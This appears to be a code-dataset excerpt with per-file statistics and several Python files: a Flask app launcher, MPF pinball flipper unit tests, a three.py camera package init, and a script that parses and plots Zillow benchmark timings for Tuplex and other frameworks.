| 0.034615
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4931c15a460bc532b0c2b1145d844c85b96a532a
| 282
|
py
|
Python
|
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
server.py
|
Thomas-Arndt/recipes
|
a8a683221e1f48faacfdde5cc665e83f19dedccd
|
[
"MIT"
] | null | null | null |
from flask_app import app
from flask_app.controllers import controller_routes
from flask_app.controllers import controller_user
from flask_app.controllers import controller_recipe
from flask_app.controllers import controller_like
# Start the development server only when this module is executed directly
# (not when it is imported). The original used `while`, which only appeared
# to work because app.run() blocks; if run() ever returned, the loop would
# restart the server indefinitely. The `if` guard is the intended idiom.
if __name__ == "__main__":
    # debug=True enables the reloader/debugger; not for production use.
    app.run(debug=True)
| 35.25
| 51
| 0.858156
| 40
| 282
| 5.625
| 0.4
| 0.2
| 0.266667
| 0.408889
| 0.693333
| 0.693333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 282
| 8
| 52
| 35.25
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0.028269
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.714286
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
493fd5802e9ca9388e1ad1acc951737563258143
| 8,252
|
py
|
Python
|
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_Flippers.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
from mpf.platforms.interfaces.driver_platform_interface import PulseSettings, HoldSettings
from mpf.core.platform import SwitchSettings, DriverSettings
from mpf.tests.MpfTestCase import MpfTestCase
from unittest.mock import MagicMock, call
class TestFlippers(MpfTestCase):
    """Tests for flipper devices on the virtual platform.

    Each test replaces the relevant platform rule methods with MagicMock
    and asserts the exact SwitchSettings / DriverSettings the flipper
    passes down when it is enabled, disabled, or software-flipped.
    """

    def getConfigFile(self):
        # Machine config consumed by MpfTestCase during setup.
        return 'config.yaml'

    def getMachinePath(self):
        # Folder holding config.yaml and related machine files.
        return 'tests/machine_files/flippers/'

    def get_platform(self):
        # Software-only platform; no real hardware involved.
        return 'virtual'

    def test_single(self):
        # Enabling a single-wound flipper installs exactly one
        # pulse-on-hit-and-enable-and-release rule carrying the configured
        # pulse power/duration and hold power.
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
        self.machine.flippers.f_test_single.enable()
        self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
                                _mock_call_args_list))
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=0.125), recycle=False)
        )

        # Disabling clears that same rule again.
        self.machine.default_platform.clear_hw_rule = MagicMock()
        self.machine.flippers.f_test_single.disable()
        self.assertEqual(1, self.machine.default_platform.clear_hw_rule.called)
        self.machine.default_platform.clear_hw_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=0.125), recycle=False)
        )

    def test_hold_with_eos(self):
        # A dual-wound flipper with an EOS switch installs two rules:
        # the hold coil on the flipper button, and the main coil gated
        # by the EOS (end-of-stroke) switch.
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_and_disable_rule = MagicMock()
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
        self.machine.flippers.f_test_hold_eos.enable()
        # Hold coil: full-power hold driven directly by the flipper button.
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_hold.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=1.0), recycle=False)
        )
        # Main coil: disabled when the EOS switch closes.
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_and_disable_rule.assert_called_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            SwitchSettings(hw_switch=self.machine.switches.s_flipper_eos.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=0.125), recycle=False)
        )

        # Disabling must clear all switch/driver rule combinations
        # (order does not matter, hence any_order below).
        self.machine.default_platform.clear_hw_rule = MagicMock()
        self.machine.flippers.f_test_hold_eos.disable()
        self.machine.default_platform.clear_hw_rule.assert_has_calls([
            call(
                SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
                DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                               pulse_settings=PulseSettings(power=1.0, duration=10),
                               hold_settings=HoldSettings(power=0.125), recycle=False)
            ),
            call(
                SwitchSettings(hw_switch=self.machine.switches.s_flipper_eos.hw_switch, invert=False, debounce=False),
                DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                               pulse_settings=PulseSettings(power=1.0, duration=10),
                               hold_settings=HoldSettings(power=0.125), recycle=False)
            ),
            call(
                SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
                DriverSettings(hw_driver=self.machine.coils.c_flipper_hold.hw_driver,
                               pulse_settings=PulseSettings(power=1.0, duration=10),
                               hold_settings=HoldSettings(power=1.0), recycle=False)
            ),
        ], any_order = True)

    def test_flipper_with_settings(self):
        # A flipper bound to a machine setting ("flipper_power") must
        # re-derive its pulse duration when the setting changes.
        flipper = self.machine.flippers.f_test_flippers_with_settings

        # Default setting: 10 ms pulse.
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
        flipper.enable()
        self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
                                _mock_call_args_list))
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=0.125), recycle=False)
        )
        self.machine.default_platform.clear_hw_rule = MagicMock()
        flipper.disable()
        self.assertEqual(1, self.machine.default_platform.clear_hw_rule.called)
        self.machine.default_platform.clear_hw_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=10),
                           hold_settings=HoldSettings(power=0.125), recycle=False))

        # Lower the power setting to 0.8: pulse duration drops to 8 ms.
        self.machine.settings.set_setting_value("flipper_power", 0.8)
        self.advance_time_and_run()
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
        flipper.enable()
        self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
                                _mock_call_args_list))
        self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
            SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
            DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
                           pulse_settings=PulseSettings(power=1.0, duration=8),
                           hold_settings=HoldSettings(power=0.125), recycle=False)
        )
        self.assertEqual(8, flipper._get_pulse_ms())

    def test_sw_flip_and_release(self):
        # Software flip of a single-wound flipper enables/disables the
        # main coil directly.
        self.machine.coils.c_flipper_main.enable = MagicMock()
        self.machine.coils.c_flipper_main.disable = MagicMock()
        self.machine.flippers.f_test_single.sw_flip()
        self.machine.coils.c_flipper_main.enable.assert_called_once_with()
        self.machine.flippers.f_test_single.sw_release()
        self.machine.coils.c_flipper_main.disable.assert_called_once_with()

        # For the dual-wound EOS flipper, a software flip pulses the main
        # coil and holds via the hold coil; release disables both.
        self.machine.coils.c_flipper_main.pulse = MagicMock()
        self.machine.coils.c_flipper_main.disable = MagicMock()
        self.machine.coils.c_flipper_hold.enable = MagicMock()
        self.machine.coils.c_flipper_hold.disable = MagicMock()
        self.machine.flippers.f_test_hold_eos.sw_flip()
        self.machine.coils.c_flipper_main.pulse.assert_called_once_with()
        self.machine.coils.c_flipper_hold.enable.assert_called_once_with()
        self.machine.flippers.f_test_hold_eos.sw_release()
        self.machine.coils.c_flipper_main.disable.assert_called_once_with()
        self.machine.coils.c_flipper_hold.disable.assert_called_once_with()
| 54.649007
| 118
| 0.698982
| 1,021
| 8,252
| 5.287953
| 0.088149
| 0.130395
| 0.065197
| 0.069272
| 0.885349
| 0.877199
| 0.877199
| 0.849972
| 0.818485
| 0.806816
| 0
| 0.012781
| 0.213039
| 8,252
| 150
| 119
| 55.013333
| 0.818602
| 0
| 0
| 0.6
| 0
| 0
| 0.007271
| 0.003514
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.058333
| false
| 0
| 0.033333
| 0.025
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b8cad16b3ff305cd7790730775631d31367039bb
| 219
|
py
|
Python
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 80
|
2019-04-04T13:41:32.000Z
|
2022-01-12T18:40:19.000Z
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 9
|
2019-04-04T14:43:50.000Z
|
2020-03-29T04:50:53.000Z
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 17
|
2019-04-04T14:20:42.000Z
|
2022-03-03T16:26:29.000Z
|
from cameras.Camera import *
from cameras.PerspectiveCamera import *
from cameras.OrthographicCamera import *
# shadow camera is an orthographic camera with differently named uniforms
from cameras.ShadowCamera import *
| 36.5
| 73
| 0.835616
| 26
| 219
| 7.038462
| 0.576923
| 0.240437
| 0.185792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 219
| 6
| 74
| 36.5
| 0.953125
| 0.324201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b8e70277314dc804f524fa67dde4f784d18e4cfd
| 45,587
|
py
|
Python
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 778
|
2021-06-30T03:40:43.000Z
|
2022-03-28T20:40:20.000Z
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 41
|
2021-07-05T17:55:56.000Z
|
2022-03-31T15:27:19.000Z
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 39
|
2021-07-01T02:40:33.000Z
|
2022-03-30T21:46:55.000Z
|
#!/usr/bin/env python
# coding: utf-8
# ## Zillow experiment plots
# this notebook produces all plots necessary for Figure 3 in the final number + numbers for the accompanying text.
# Figure 3, 7 and table3
# In[24]:
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import re
import json
import seaborn as sns
import datetime
from matplotlib.patches import Patch
import matplotlib.patches as mpatches
from matplotlib.lines import Line2D
from matplotlib.path import *
import warnings
warnings.filterwarnings("ignore")
import scipy.constants
rho = scipy.constants.golden
# make nice looking plot
from .paper import *
import logging
adjust_settings()
# In[75]:
def load_zillow_to_df(data_root):
    """Parse per-run Zillow benchmark logs in ``data_root`` into a DataFrame.

    Each ``*-run-<N>.txt`` file is decoded according to the framework that
    produced it (C++ baseline, Scala/Spark, Tuplex, or a JSON-emitting
    Python framework). Files named ``*compile-run*`` are skipped, as are
    empty files (timeouts) and files that fail to parse.

    Args:
        data_root: directory containing the benchmark log files.

    Returns:
        ``pandas.DataFrame`` with one row per successfully parsed run;
        columns include ``framework``, ``mode``, ``type``, ``run``,
        ``job_time`` and whichever per-phase timings each log provides.
    """
    files = os.listdir(data_root)
    rows = []
    for file in files:
        path = os.path.join(data_root, file)
        name = file[:file.find('-run')]
        # skip compile runs, they should be loaded separately...
        if 'compile-run' in file:
            continue
        try:
            if file.endswith('.txt'):
                with open(path, 'r') as fp:
                    lines = fp.readlines()
                # skip empty files (means timeout)
                if len(lines) == 0:
                    continue
                row = {}
                # run number is encoded in the file name: ...run-<N>.txt
                run_no = int(path[path.rfind('run-') + 4:path.rfind('.txt')])
                if 'cc-' in path or 'cpp_' in path:
                    # C++ baseline: last line is a JSON record of ns timings.
                    d = json.loads(lines[-1])
                    row = {}
                    row['write'] = d['output'] / 10**9
                    row['job_time'] = d['total'] / 10**9
                    if 'load' in d.keys():
                        row['load'] = d['load'] / 10**9
                        row['compute'] = d['compute'] / 10**9
                    else:
                        row['compute'] = d['transform'] / 10**9
                    if 'no-preload' in file or 'no_preload' in file:
                        row['type'] = 'no-preload'
                    else:
                        row['type'] = 'preload'
                    row['framework'] = 'c++'
                    # hand-measured compile time
                    # TODO: update!
                    row['compile'] = 7.529
                    row['mode'] = 'c++'
                    # override if compute is available
                    if 'compute_time' in d.keys():
                        row['compute'] = d['compute_time']
                elif 'scala' in path:  # Scala
                    row['framework'] = 'scala'
                    row['type'] = 'single-threaded'
                    row['mode'] = 'scala'
                    if 'sparksql' in path:
                        row['framework'] = 'spark'
                        row['type'] = 'scala-sql'
                        row['mode'] = 'scala'
                    # compile times & Co (hand measured); first two lines
                    # hold the startup/job wall-clock times as free text.
                    row['job_time'] = float(re.sub('[^0-9.]*', '', lines[1]))
                    row['startup_time'] = float(re.sub('[^0-9.]*', '', lines[0]))
                elif 'tuplex' in path:
                    # tuplex decode
                    try:
                        d = {}
                        if 'tuplex' in name:
                            d = json.loads(list(filter(lambda x: 'startupTime' in x, lines))[0])
                        else:
                            d = json.loads(lines[-1].replace("'", '"'))
                        load_time = 0.
                        if 'io_load_time' in d.keys():
                            load_time = d['io_load_time']
                        if 'io_load' in d.keys():
                            load_time = d['io_load']
                        row = {'startup_time': d['startupTime'], 'job_time': d['jobTime'], "load": load_time}
                        row['framework'] = 'tuplex'
                        if '-st' in path or '_st' in path:
                            row['type'] = 'single-threaded'
                        elif '-io' in path:
                            row['type'] = 'cached'
                        else:
                            row['type'] = 'multi-threaded'
                        if 'preload' in path:
                            row['type'] = row['type'] + '-preload'
                        if 'nonvo' in path:
                            row['type'] = row['type'] + '-no-nvo'
                        # breakdown time extract for tuplex
                        c = '\n'.join(lines)
                        pattern = re.compile(r'load&transform tasks in (\d+.\d+)s')
                        lt_times = np.array(list(map(float, pattern.findall(c))))
                        pattern = re.compile(r'compiled to x86 in (\d+.\d+)s')
                        cp_times = np.array(list(map(float, pattern.findall(c))))
                        m = re.search(r'writing output took (\d+.\d+)s', c)
                        if m:
                            row['write'] = float(m[1])
                        row['compute'] = lt_times.sum()
                        row['compile'] = cp_times.sum()
                        # override if compute is available
                        if 'compute_time' in d.keys():
                            row['compute'] = d['compute_time']
                    except Exception as e:
                        print(e)
                    row['mode'] = 'python3'
                else:
                    # generic Python frameworks (spark/dask/pandas/...):
                    # last line is a JSON (possibly single-quoted) record.
                    d = json.loads(lines[-1].replace("'", '"'))
                    # clean framework
                    row['framework'] = d['framework']
                    if 'Spark' in row['framework']:
                        row['framework'] = 'spark'
                    if 'dask' in row['framework']:
                        row['framework'] = 'dask'
                    if 'pandas' in row['framework']:
                        row['framework'] = 'pandas'
                    # override framework for nuitka + cython
                    if 'nuitka' in path:
                        row['framework'] = 'nuitka'
                    if 'cython' in path:
                        row['framework'] = 'cython'
                    # clean keys
                    if 'load_time' in d.keys():
                        row['load'] = d['load_time']
                    if 'run_time' in d.keys():
                        row['compute'] = d['run_time']
                    if 'write_time' in d.keys():
                        row['write'] = d['write_time']
                    # BUG FIX: the original condition was
                    # `if 'nuitka' or 'cython' in path:` which is always
                    # truthy ('nuitka' is a non-empty string). Only look for
                    # a compile time in nuitka/cython logs.
                    if 'nuitka' in path or 'cython' in path:
                        # regex extract
                        m = re.search(r"compilation via \w+ took: (\d\.\d+)s", '\n'.join(lines))
                        if m:
                            row['compile'] = float(m[1])
                    row['type'] = d['type']
                    # adjust spark types
                    if 'RDD dict' in row['type']:
                        row['type'] = 'dict'
                    if 'RDD tuple' in row['type']:
                        row['type'] = 'tuple'
                    if 'DataFrame' in row['type']:
                        row['type'] = 'sql'
                    row['job_time'] = d['job_time']
                    if 'startup_time' in d.keys():
                        row['startup_time'] = d['startup_time']
                    if 'pypy' in path:
                        row['mode'] = 'pypy3'
                    else:
                        row['mode'] = 'python3'
                if len(row) > 0:
                    row['run'] = run_no
                    rows.append(row)
        except Exception:
            # malformed or partial log files are ignored on purpose
            pass
    return pd.DataFrame(rows)
# In[76]:
def load_data(zillow_folder='r5d.8xlarge/zillow'):
    """Load the Zillow Z1 and Z2 benchmark runs into DataFrames.

    Drops the first (warm-up) run of each query and logs how close Tuplex's
    job time comes to the hand-tuned C++ baseline for each query.

    Args:
        zillow_folder: root folder holding the ``Z1/`` and ``Z2/`` run logs.

    Returns:
        tuple ``(df_Z1, df_Z2)`` of per-run timing DataFrames.
    """
    def _load_query(subdir):
        # Parse one query folder, sort columns, and drop the warm-up run.
        df = load_zillow_to_df(os.path.join(zillow_folder, subdir))
        df = df[sorted(df.columns)]
        # exclude first, warmup run
        return df[df['run'] != 1]

    def _log_tuplex_vs_cc(df, query_name):
        # Compare mean Tuplex job time against the C++ baseline compute time.
        subdf = df[df['type'].isin(['single-threaded-preload', 'preload'])]
        subdf = subdf.groupby(['framework', 'mode', 'type']).mean().sort_values(by='compute').reset_index()
        recs = subdf.to_dict('records')
        tuplex_time = recs[1]['job_time']  # note the switch due to how times are measured
        cc_time = recs[0]['compute']
        logging.info('Zillow {}:: Tuplex takes {:.2f}s vs. C++ {:.2f}s, i.e. comes within {:.2f}%'.format(
            query_name, tuplex_time, cc_time, (tuplex_time - cc_time) / tuplex_time * 100))

    df_Z1 = _load_query('Z1/')
    df_Z2 = _load_query('Z2/')
    _log_tuplex_vs_cc(df_Z1, 'Z1')
    _log_tuplex_vs_cc(df_Z2, 'Z2')
    # (the original also ended with a dead no-op expression
    # `tuplex_time, cc_time`, removed here)
    return df_Z1, df_Z2
def table3(df):  # use here df_Z1!
    """Log Table 3 of the paper: Cython vs. Nuitka vs. Tuplex vs. C++.

    Filters ``df`` down to the single-threaded compiled-framework runs,
    logs the mean compile/compute times per framework, the compile and
    compute speedups of Tuplex over the alternatives, and the best
    CPython result for reference.
    """
    # ## Table 3: Cython vs. Nuitka vs. Tuplex
    compiled_fws = ['cython', 'tuplex', 'nuitka', 'c++']
    selected = df[df['mode'].isin(['python3', 'c++']) & df['framework'].isin(compiled_fws)]
    selected = selected[selected['type'].isin(['single-threaded', 'tuple', 'no-preload'])]

    means = (selected.groupby(['framework', 'mode', 'type'])
             .mean()
             .reset_index()
             .sort_values(by='compute')
             .reset_index(drop=True))
    table3 = means[['framework', 'mode', 'type', 'compile', 'compute']]
    logging.info('Table3:\n{}'.format(table3))

    # => For the paper, use compile and compute columns
    tuplex_row = means[means['framework'] == 'tuplex'].to_dict('records')[0]
    tplx_compile = tuplex_row['compile']
    tplx_compute = tuplex_row['compute']
    others = means[means['framework'] != 'tuplex']
    logging.info('Tuplex compile speedup: {:.2f}x - {:.2f}x'.format(
        others['compile'].min() / tplx_compile, others['compile'].max() / tplx_compile))
    logging.info('Tuplex compute speedup: {:.2f}x - {:.2f}x'.format(
        others['compute'].min() / tplx_compute, others['compute'].max() / tplx_compute))

    # Compare this to best CPython result
    best_cpython_result = (df[df['framework'] == 'python3']
                           .groupby(['framework', 'mode', 'type'])
                           .mean()
                           .reset_index()
                           .sort_values('compute')
                           .head(1)[['framework', 'mode', 'type', 'compute']])
    logging.info('Best CPYthon result: {}s'.format(best_cpython_result['compute'].values[0]))
def figure3(df_Z1, df_Z2, output_folder):
    """Plot Figure 3: Zillow Z1 and Z2 runtimes (10G input).

    For each query one figure with two panels is produced -- (a)
    single-threaded frameworks and (b) 16x-parallel frameworks -- and
    saved as figure3_zillow_10G_<query>.pdf in output_folder.

    Relies on module-level names defined elsewhere in this file:
    plt_bar, column_width, rho, plt, sns, np, Line2D, logging, os.
    """
    # ## Zillow Z1 plots
    logging.info('Plotting Z1')
    st_fws = ['tuplex', 'cython', 'nuitka', 'python3', 'c++', 'pandas', 'scala']
    mt_fws = ['tuplex', 'spark', 'dask']
    # which df to use?
    df = df_Z1.copy()
    # drop tuplex preload
    df = df[df['type'] != 'single-threaded-preload']
    query_name = 'Z1'
    # Single-threaded results: mean/std per (framework, type), split into
    # dict/tuple/rest groups sorted by job time.
    # NOTE(review): the original computed these frames twice in a row with
    # byte-identical expressions; the redundant second pass was removed.
    df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
    df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
    df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
    df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
    df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
    df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
    df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
    df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
    df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
    df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
    # Multi-threaded results
    df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
    df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
    df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
    df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
    # links: https://stackoverflow.com/questions/14852821/aligning-rotated-xticklabels-with-their-respective-xticks
    sf = 1.1
    fig, axs = plt.subplots(figsize=(sf * column_width,
                                     sf * column_width / rho * 0.65), nrows=1, ncols=2, constrained_layout=True)
    rot = 25
    mks = 14
    w = .8
    w2 = w / 2
    precision = 1
    cc_col = [0, 0, 0]
    tplx_col = sns.color_palette()[0]
    dask_col = np.array(sns.color_palette()[3])
    pyspark_col = 1.2 * np.array(sns.color_palette()[2])
    pysparksql_col = 0.6 * np.array(pyspark_col)
    fsize = 30
    py_col = pyspark_col
    cython_col = [161 / 255., 67 / 255., 133 / 255.]
    nuitka_col = [123 / 255, 88 / 255, 219 / 255.]
    scala_col = [.6, .6, .6]
    axs = list(axs.flat)
    ao = 3.5
    lim_high = 62
    ##### SINGLE-THREADED ######
    ax = axs[0]
    python3_dict_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
    python3_tuple_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
    pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
    tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
    cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
    scala_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'scala']['job_time']])
    plt_bar(ax, 1, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w, py_col,
            'Python', 'center', precision=precision, yerr=python3_dict_err, fsize=fsize)
    plt_bar(ax, 2, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'],
            w, py_col, 'Python', 'center', above_offset=ao * 10, precision=precision, yerr=python3_tuple_err, fsize=fsize)
    plt_bar(ax, 0, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'],
            w, dask_col, 'Pandas', 'center', above_offset=ao * 10, precision=precision, yerr=pandas_err, fsize=fsize)
    plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'],
            w, tplx_col, 'Tuplex', 'above', precision=precision, above_offset=ao * 10, yerr=tplx_err, fsize=fsize)
    plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'scala']['job_time'],
            w, scala_col, 'Scala', 'above', precision=precision, above_offset=ao * 10, yerr=scala_err, fsize=fsize)
    plt_bar(ax, 5, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'],
            w, cc_col, 'C++', 'above', precision=precision, above_offset=ao * 10, yerr=cc_err, fsize=fsize)
    ax.axvline(3.5, linestyle='--', lw=2, color=[.6, .6, .6])
    legend_elements = [Line2D([0], [0], marker='o', color='w', label='Python ',
                              markerfacecolor=py_col, markersize=mks),
                       Line2D([0], [0], marker='o', color='w', label='Pandas',
                              markerfacecolor=dask_col, markersize=mks),
                       Line2D([0], [0], pickradius=2, marker='o', color='w', label='Tuplex',
                              markerfacecolor=tplx_col, markersize=mks),
                       Line2D([0], [0], marker='o', color='w', label='Scala (man-opt.)',
                              markerfacecolor=scala_col, markersize=mks),
                       Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (man-opt.)',
                              markerfacecolor=cc_col, markersize=mks)]
    # legend, also valid for Z2
    L = ax.legend(handles=legend_elements, loc='upper right', fontsize=15, bbox_to_anchor=(1, 1),
                  borderaxespad=-.8, handletextpad=0., ncol=2, columnspacing=0)
    cols = [py_col, dask_col, tplx_col, scala_col, cc_col]
    for i, text in enumerate(L.get_texts()):
        text.set_color(cols[i])
    ax.set_xticks([0, 1, 2, 3, 4, 5])
    ax.set_xticklabels(['Pandas', 'dict', 'tuple', 'Tuplex', 'Scala', 'C++'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, lim_high * 10)
    ax.set_xlim(-.5, 5.5)
    ax.set_xlabel('({}a) single-threaded'.format(query_name), fontsize=27, labelpad=15)
    ax.set_ylabel('runtime in s', labelpad=10)
    ##### MULTI-THREADED ######
    ax = axs[1]
    spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
    spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
    spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
    spark_scala_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'scala-sql')]['job_time']
    spark_sql_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
    spark_tuple_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
    spark_dict_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
    spark_scala_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'scala-sql')]['job_time']])
